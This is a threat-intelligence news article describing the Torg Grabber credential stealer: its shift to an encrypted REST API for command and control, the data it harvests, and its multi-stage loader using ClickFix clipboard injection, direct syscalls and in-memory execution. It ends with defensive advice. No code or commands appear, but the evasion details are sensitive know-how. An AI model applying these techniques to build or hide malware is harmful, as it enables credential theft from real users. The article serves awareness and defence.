Torg Grabber Stealer Shifts to Encrypted REST API for C2
Key Takeaways Torg Grabber, a credential stealer offered as Malware-as-a-Service (MaaS), has rapidly evolved its command-and-control (C2) infrastructure. The malware transitioned from simple...
Key Takeaways
- Torg Grabber, a credential stealer offered as Malware-as-a-Service (MaaS), has rapidly evolved its command-and-control (C2) infrastructure.
- The malware transitioned from simple Telegram-based exfiltration to a highly sophisticated, encrypted REST API C2 system within three months.
- Torg Grabber targets a wide array of sensitive data, including browser credentials, cryptocurrency wallets, 2FA tools, and session data from popular applications like Discord and Steam.
- The stealer utilizes a multi-stage loader chain and in-memory execution to evade detection, often delivered via fake game cheats or cracked software.
Torg Grabber Stealer Adopts Encrypted REST API for Advanced C2 Operations
A new credential-stealing malware, identified as Torg Grabber, is rapidly escalating its capabilities as a Malware-as-a-Service (MaaS) offering. In a mere three months, this stealer has undergone significant development, migrating its data exfiltration mechanisms from basic Telegram channels to a sophisticated, encrypted REST API for command-and-control (C2) communications. This swift evolution underscores a growing trend of advanced techniques within the cybercrime landscape.
Table Of Content
Initially relying on straightforward Telegram-based data exfiltration, Torg Grabber quickly matured to leverage a fully encrypted REST API for its C2 infrastructure. The operational scale of this threat is evident, with 334 unique samples compiled during its brief observed lifespan and over 40 distinct operator tags discovered within its binaries. This robust activity indicates an organized, builder-based cybercrime operation catering to numerous malicious buyers.
The malware derives its name from one of its primary C2 domains, technologytorg.com, where “torg” is a Russian term signifying “trade” or “marketplace.” This nomenclature is particularly fitting given the malware’s purpose of acquiring and trading stolen credentials.
Discovery and Technical Analysis
The discovery of Torg Grabber began when a sample, initially misidentified as Vidar Stealer, arrived at a research lab. Forensic examination quickly revealed discrepancies: the binary was a 64-bit Portable Executable compiled with MinGW-GCC, contrasting sharply with Vidar’s 32-bit MSVC build. Further analysis uncovered an embedded debug string, “grabber v1.0,” and a C2 protocol utilizing REST API endpoints secured with ChaCha20 encryption and HMAC-SHA256 authentication—architectural elements entirely distinct from Vidar.
Gen Digital’s Threat Research Team was responsible for identifying and formally naming the malware after an in-depth dissection of its binary. Their analysts confirmed that Torg Grabber progressed through three distinct exfiltration phases within its short operational period.
- Phase 1 (December 9-11, 2025): Early builds transmitted stolen ZIP archives to private Telegram channels via the Telegram Bot API, a method offering speed and requiring minimal infrastructure.
- Phase 2 (December 17-20, 2025): The malware briefly shifted to a raw TCP socket protocol, employing a custom 9-byte binary frame secured with ChaCha20-Poly1305 encryption.
- Phase 3 (Beginning December 18, 2025): Torg Grabber transitioned to a production-grade REST API over HTTPS, routed through Cloudflare. This advanced approach significantly complicates traffic interception and domain-based blocking efforts.
The malware’s data collection capabilities are extensive. It targets credentials from 25 Chromium-based browsers and 8 Firefox-family browsers, harvests data from over 850 browser extensions including cryptocurrency wallets and two-factor authentication (2FA) tools, and captures session data from applications like Discord, Telegram, and Steam. Additionally, it collects VPN configurations, FTP client data, and desktop screenshots. Prior to initiating data collection, Torg Grabber performs an evasion check, scanning for 46 antivirus signatures across 24 different security products to assess the victim’s defenses.
Investigations into the confirmed operator tags linked eight of them to active Telegram accounts associated with Russian-speaking cybercrime networks.
The Loader Chain: From Dropper to In-Memory Execution
Torg Grabber is not deployed as a standalone executable; instead, it is delivered via a sophisticated, multi-stage loader chain designed to evade detection. This chain progressively unpacks the stealer, ensuring it only executes in memory.
The initial stage, referred to as Stage 0, functions as the dropper. Victims typically encounter this through deceptive means such as fake game cheats, pirated software packages, or clipboard injection attacks (like ClickFix) hosted on Google Apps Script. A documented infection on January 30, 2026, involved a malicious webpage silently injecting a PowerShell command into the user’s clipboard, instructing them to paste and execute it. This action initiated a covert BITS Transfer download, which then executed through Windows’ legitimate svchost.exe process, effectively blending with normal system traffic and bypassing many endpoint security tools.
Stage 1 is a self-extracting loader containing an AES-256-CBC encrypted overlay appended beyond the binary’s standard section data. This stage decodes and decrypts its payload using custom hex decoding and AES decryption routines. It further enhances stealth by resolving Windows NT API calls at runtime through direct syscalls, thus presenting no visible imports for static analysis tools to flag.
Stage 2 operates entirely within memory as a reflective PE loader. This stage maps the final stealer payload directly into memory without writing any components to disk. By the time Stage 3 activates, the Torg Grabber stealer is running within a live process, leaving no persistent files for disk-based scanning or detection.
What You Should Do
- Exercise Caution with Downloads: Avoid downloading software from untrusted sources, including unofficial game cheat sites, cracked application platforms, and suspicious links.
- Monitor PowerShell Activity: IT security teams should implement monitoring for PowerShell commands containing base64-encoded arguments and unexpected BITS Transfer job creations.
- Enhance Endpoint Detection: Configure endpoint security tools to flag direct syscall usage and patterns indicative of in-memory PE loading.
- Secure Browser Data: For organizations using Chromium-based browsers, ensure App-Bound Encryption is properly configured. Treat any unexplained browser process suspensions during normal activity as a potential indicator of compromise.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.